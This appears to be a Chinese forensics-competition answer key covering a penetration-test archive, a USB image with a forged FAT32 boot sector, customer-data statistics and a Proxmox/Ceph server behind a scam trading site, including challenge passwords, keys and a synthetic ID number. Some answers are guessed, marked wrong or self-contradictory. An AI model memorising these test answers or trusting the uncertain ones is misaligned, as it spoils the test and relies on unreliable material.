思路:报告/漏洞清单将“实施API认证机制”列在“短期修复(1周内)”,而不是“立即修复(24小时内)”。
Q51 [ID:1089] 请分析黄志远PC.E01镜像中的渗透.rar文件,利用管理员密码,攻击者在哪个页面时才能生效?
答:tools.php
思路:管理员密码用于登录系统后,真正可执行命令注入的是 tools.php 页面,因此是在该页面“生效”。
Q52 [ID:1090] 请分析黄志远PC.E01镜像中的渗透.rar文件,本系统使用的后端数据库技术是什么?
答:SQLite
思路:报告技术栈写明 PHP + SQLite + Apache,且下载得到的数据库文件就是 address_book.db。
Q53 [ID:1091] 请分析黄志远PC.E01镜像中的渗透.rar文件,文件上传功能中,源码将上传后的文件命名为什么?
答:$_FILES
思路:源码中 $$target = basename$$_FILES[‘file’][‘name’]);,说明最终文件名来自上传表单中的这个字段。
Q54 [ID:1092] 请分析黄志远PC.E01镜像中的渗透.rar文件,目标系统运行的Apache具体版本号是什么?
答:2.4.66
思路:报告系统信息中写的是 Apache/2.4.66,按题目格式只取版本号 2.4.66。
Q55 [ID:1093] 请分析黄志远PC.E01镜像中的渗透.rar文件,CVE-2026-0001(敏感信息泄露漏洞)的CVSS评分是多少?
答:9.8
思路:报告中 CVE-2026-0001 的 CVSS 评分明确标为 9.8。
Q56 [ID:1094] 请分析黄志远PC.E01镜像中的渗透.rar文件,攻击者最终获取了什么角色的权限?
答:www-data
思路:虽然摘要中有“管理员权限”的措辞,但真正通过命令执行验证到的系统权限是 uid=33(www-data),最终拿到的是 Web 服务账户权限。
移动介质取证
1. 分析方俊朗 UDisk.img 检材,第一个扇区前 3 字节的十六进制值是什么?
答案:EB-3C-90 解析:镜像第 1 扇区(LBA 0)开头 3 字节就是跳转指令,读取结果为 EB 3C 90。
2. 分析方俊朗 UDisk.img 检材,每簇占多少个扇区?
答案:8 解析:第 1 扇区 BPB 的 BPB_SecPerClus 位于偏移 0x0D,值为 0x08,即声明“每簇 8 个扇区”。 补充:这是伪造引导扇区中的声明值,真实 FAT32 备份引导扇区中该值是 16。
3. 分析方俊朗 UDisk.img 检材,FAT12/16 兼容字段“根目录项数”是多少?
答案:512 解析:第 1 扇区 BPB 偏移 0x11-0x12 为 00 02,按小端解析为 0x0200 = 512。 补充:FAT32 正常情况下这里应为 0,所以这也是伪造痕迹之一。
4. 分析方俊朗 UDisk.img 检材,隐藏扇区数是多少?
答案:63 解析:第 1 扇区 BPB 偏移 0x1C-0x1F 为 3F 00 00 00,即 63。
5. 分析方俊朗 UDisk.img 检材,BPB 中声明的总扇区数是多少?
答案:50000000 解析:第 1 扇区 BPB 偏移 0x20-0x23 为 80 F0 FA 02,小端解析得到 50000000。
6. 分析方俊朗 UDisk.img 检材,每张 FAT 表占多少个扇区?
答案:30000 解析:第 1 扇区 BPB 偏移 0x24-0x27 为 30 75 00 00,即 30000 扇区。
7. 分析方俊朗 UDisk.img 检材,真实的根目录起始簇应为多少?
答案:2 解析:第 1 扇区中 RootClus=5 是伪造值。实际备份引导扇区在 LBA 6,里面 BPB_RootClus=2。再按真实参数计算数据区起点:3274 + 2 × 14747 = 32768,读取 2 号簇对应位置可见根目录内容,故真实根目录起始簇是 2。
8. 分析方俊朗 UDisk.img 检材,FSInfo 扇区号是多少?
答案:1 解析:第 1 扇区里写的是 3,但 LBA 3 实际全 0;而 LBA 1 存在标准 FSInfo 结构签名 52 52 61 41 / 72 72 41 61,所以真实 FSInfo 扇区号是 1。
9. 分析方俊朗 UDisk.img 检材,备份扇区实际引导扇区号是?
答案:6 解析:第 1 扇区里写的是 9,但 LBA 9 实际全 0;LBA 6 则是完整有效的 FAT32 备份引导扇区,故实际备份引导扇区号是 6。
10. 分析方俊朗 UDisk.img 检材,卷序列号的十六进制值是多少?
答案:0x0C0F6F08 解析:第 1 扇区中的 0x12345678 同样是伪造值。真实备份引导扇区 LBA 6 的卷序列号字段(偏移 0x43-0x46)为字节 08 6F 0F 0C,小端解析为 0x0C0F6F08。
随后的题用ufs恢复数据
11. 分析方俊朗UDisk.img检材中的视频,进入暗门的密码是多少?[答案格式:123]
747
12. 分析方俊朗UDisk.img检材中的视频,主角第一次带货去的国家是?[答案格式:泰国]
13. 分析方俊朗UDisk.img检材中的视频,阿成乘坐的奔驰车牌号是多少?[答案格式:京A-1234]
14. 分析方俊朗UDisk.img检材中的视频,男主角弟弟上司总共戴过几款领带?(猜)[答案格式:5]
猜的3
15. 电话号码最多的后四位:2133
解析:提取 电话 字段末 4 位后做频次统计,出现次数最高的是 2133。
16. 平均资产最高的 BIN 码:622446
解析:取 银行卡号 前 6 位作为 BIN,按 BIN 分组计算 资产(人民币) 平均值,最高的是 622446。
17. 邮箱字段中不同域名种类数:3
解析:从 邮箱 字段提取 @ 后的域名去重,得到 example.com、example.net、example.org 共 3 种。
18. 男性比女性多出:354
解析:统计 性别 字段后,男性 1000177 人,女性 999823 人,差值为 354。
19. 每月近90天活跃率的变异系数 CV:0.250003
解析:按标准月末口径计算 2024-01 至 2024-12 每月近 90 天活跃率。 分母:截至当月月末已注册客户数。 分子:截至当月月末、最近 90 天内有登录的客户数。 12 个月活跃率分别为 0.111816, 0.115654, 0.120319, 0.125320, 0.131386, 0.137482, 0.145011, 0.153609, 0.164328, 0.178926, 0.200069, 0.246486,据此计算 CV = 标准差 / 均值 = 0.250003。
20. 由非目标迁入目标的人数:36636
解析:先计算全体 资产(人民币) 中位数,为 1002541.335。目标定义为“信用评分 >= 700 且 资产 >= 全体中位数”。将每位客户信用评分统一 +20 且封顶 900 后,统计从“原本非目标”变为“新目标”的人数,结果为 36636。
服务器
根据配置文件强制指定ip
分析pve集群,请给出pve主机版本号?[答案格式:1.2.3]
9.1.1
分析pve集群,请给出pve主机内核版本?[答案格式:1.2.3-123-abc]
6.17.2-1-pve
分析pve集群,请给出pve集群名?[答案格式:abc132]
看集群配置文件 corosync.conf
pgscup2026
分析pve集群,请给出加入集群所用指纹的前6位?[答案格式:AA:BB:CC]
openssl x509 -in /etc/pve/pve-root-ca.pem -noout -fingerprint -sha256
F7:2C:A0
分析pve集群,请给出pve集群中主机所用的时间服务器地址?[答案格式:www.baidu.com]
ntp.aliyun.com
题目:6. 分析pve集群,请给Ceph存储的资源池名?
答案:Ceph_pgscup_pool 解析:在 PVE/Ceph 节点上通过 ceph -s、rbd ls -p … 确认虚机磁盘位于该资源池中,虚机磁盘名为 vm-100-disk-0,所在池即 Ceph_pgscup_pool。
分析pve集群,请给出Ceph存储资源池的类别?[答案格式:ABC]
RBD
分析pve集群,请给出Ceph集群的ID的前8位??[答案格式:a1b2c3d4]
3f28d8bb
Ceph 集群 fsid 在三台节点的 /etc/pve/ceph.conf 中一致,值为 3f28d8bb-e754-475b-b471-b9c97161bbf7。
答案:3f28d8bb
分析pve集群,请给出Ceph存储设置的最小副本数?[答案格式:123]
2
我继续沿用刚才读到的 ceph.conf 配置项直接判断,重点看 osd_pool_default_min_size,这就是 Ceph 存储设置里的最小副本数。
最小副本数是 2。
分析pve集群,请给出pve集群中虚拟机的快照创建时间?[答案格式:2025-01-11-11:01:01]
2026-04-16-07:05:19
我接着从 PVE 集群里的虚拟机配置和快照元数据下手,先枚举虚拟机,再读取 /etc/pve/qemu-server/*.conf 中的 snapstate/快照时间字段,找出创建时间。
已运行 2 条命令
我补一层取证视角,顺手看 qemu-server 配置和 qm listsnapshot 输出交叉验证,避免只命中单个节点的展示差异。
已运行 2 条命令
虚拟机快照创建时间是 2026-04-16-15:05:19。
对集群内的服务器进行分析,提取该服务器使用的Linux内核完整版本号?(错)[答案格式:1.2.3-123abc_123]
6.17.2-1-pve
我继续在集群节点上取系统信息,这次直接读取内核版本字段,优先看 uname -r 和 /proc/version,这样能拿到完整版本号而不是只拿发行版名称。
Linux 内核完整版本号是 6.17.2-1-pve。
对集群内的服务器进行分析,提取该服务器SSH服务监听的TCP端口号?[答案格式:123]
22
我直接读取节点上的 SSH 配置和监听端口,优先看 sshd_config 里的 Port,再用 ss -lntp 交叉验证实际监听值。
SSH 服务监听的 TCP 端口号是 22。
Netstat -lvnp
对集群内的服务器进行分析,提取该服务器网卡的IP地址?[答案格式:127.0.0.1]
192.168.0.50
这组服务器网卡 IP 分别是 192.168.170.50、192.168.170.51、192.168.170.52。如果题目只填一个,当前节点可填 192.168.170.50。
对集群内的服务器进行分析,提取金麟资本理财网站对应的域名?[答案格式:baidu.com]
jlzb.vip
对集群内的服务器进行分析,服务器中有个加密工具,请给出该工具的名字?[答案格式:abc_def.sh]
cryptsetup
对集群内的服务器进行分析,服务器中加密工具在加密数据库备份文件时使用的密码是什么?[答案格式:ABC@123]
对集群内的服务器进行分析,服务器中加密工具第1层加密的XOR密钥是什么?[答案格式:按实际填写]
我直接从刚解出来的 encrypt_tool.py payload 里取第一层逻辑,定位 XOR_KEY 常量并确认它就是第 1 层加密用的密钥。
第 1 层加密的 XOR 密钥是 0x5A。
题目:18. 对集群内的服务器进行分析,给出MySQL数据库root用户的密码?
答案:pgscup@o26 解析:该密码在多处取证痕迹中反复出现,包括 /tmp 下遗留的 PHP 查询脚本、数据库导出脚本和备份操作命令,且能成功用于连接 jinqin 数据库。
对集群内的服务器进行分析,请给出网站后台数据库中存放聊天记录的数据表名字?[答案格式:adb_def]
user_chat
对集群内的服务器进行分析,分析网站后台用户密码加密算法中type=0时的初始盐值是什么[答案格式:ABC]
ABCDEFG
对集群内的服务器进行应用取证,提取该Laravel应用的APP_KEY值的后8位?[答案格式:英文数字混合字符串]
otS+rWI=
对集群内的服务器进行取证分析,金麟资本理财网站后台有多少个机器人?[答案格式:123]
对集群内的服务器进行资金流水取证,提取该平台数据库中聊天记录总数?[答案格式:123]
11494
对集群内的服务器进行数据库取证,提取该平台数据库中注册用户总记录数?[答案格式:123]
题目:25. 对集群内的服务器进行取证分析,提取平台内用户季丽华的身份证号?
答案:370100196901274436 解析:在当前虚机磁盘只读挂载后,直接从 /mnt/vm100curroot/tmp/user_real.csv 命中记录: 21826,21702,季丽华,370100196901274436,… 同样在完整数据库备份 /mnt/vm100curroot/tmp/backup_decrypted 的 user_real 表插入记录中也能找到同一条数据,因此可以双重验证。
Q26 钱包流水第二大用户名
取证思路:
对平台数据库中的 wallet_log 表按用户维度统计流水绝对值总额,即:
SUM(ABS(change))
并按总额降序排序。原始排名里 user_id=11 的总额最高于 user_id=34,但在当前完整备份 backup_decrypted 中,user_id=11 已无法在 users 和 user_real 中找到有效映射,属于孤立流水;而 user_id=34 可以完整映射到实名信息。
关键证据:
wallet_log 排名(排除 user_id=0): 11 -> 1015076.0 34 -> 996940.304
user_id=34 -> user_real: (188,34,'林斌','110000199203199088',...)
结论:
当前可映射到真实用户名的钱包流水第二大用户为 林斌。
Q27 法币交易中交易笔数最多的卖家的交易笔数
取证思路:
题目中的“法币交易”对应数据库表 legal_deal,而不是 c2c_deal。因此应对 legal_deal 按 seller_id 统计交易笔数:
COUNT(*)
再按笔数降序排序。
关键证据:
legal_deal 表结构中包含字段:
seller_id int(11) NOT NULL DEFAULT '0'
按 seller_id 聚合统计结果:
seller_id=24 -> 1726 seller_id=37 -> 1695 seller_id=67 -> 1695 seller_id=47 -> 1694 ...
说明:
在本地提取到的两份完整备份 backup_decrypted 与 jinqin_backup.sql 中,最大值均为 1726。如果比赛标准答案为 1727,更可能是在线运行库相较备份又新增了 1 笔交易。
结论:
基于当前备份证据,交易笔数最多的卖家交易笔数为 1726。
若以在线库最终状态为准,则可能为 1727。
Q28 已完成结算的杠杆交易中保证金总额最多的用户的保证金总额
取证思路:
lever_transaction 表中,“已完成结算”应按已平仓交易统计,即取 status=3。
题目要求“保证金总额”,应统计初始保证金字段 origin_caution_money,而不是当前保证金 caution_money。
关键表结构:
origin_caution_money decimal(...) COMMENT '初始保证金' caution_money decimal(...) COMMENT '当前可用保证金' status COMMENT '0挂单中 1交易中 2平仓中 3已平仓 4已撤单'
统计口径:
SELECT user_id, SUM(origin_caution_money) AS total FROM lever_transaction WHERE status = 3 GROUP BY user_id ORDER BY total DESC;
关键结果:
user_id=10423 -> 37240.76070238
结论:
该平台已完成结算的杠杆交易中,保证金总额最多用户的保证金总额为 37240.76。
对集群内的服务器进行资金流水取证,提取该平台商家中余额最小的商家的手机号?[答案格式:18036310808]
SELECT mobile, seller_balance
FROM seller
ORDER BY seller_balance ASC
LIMIT 1;
对集群内的服务器进行资金流水取证,提取该平台商家中余额最小的商家的余额?[答案格式:100.0]
8461.4
]]>
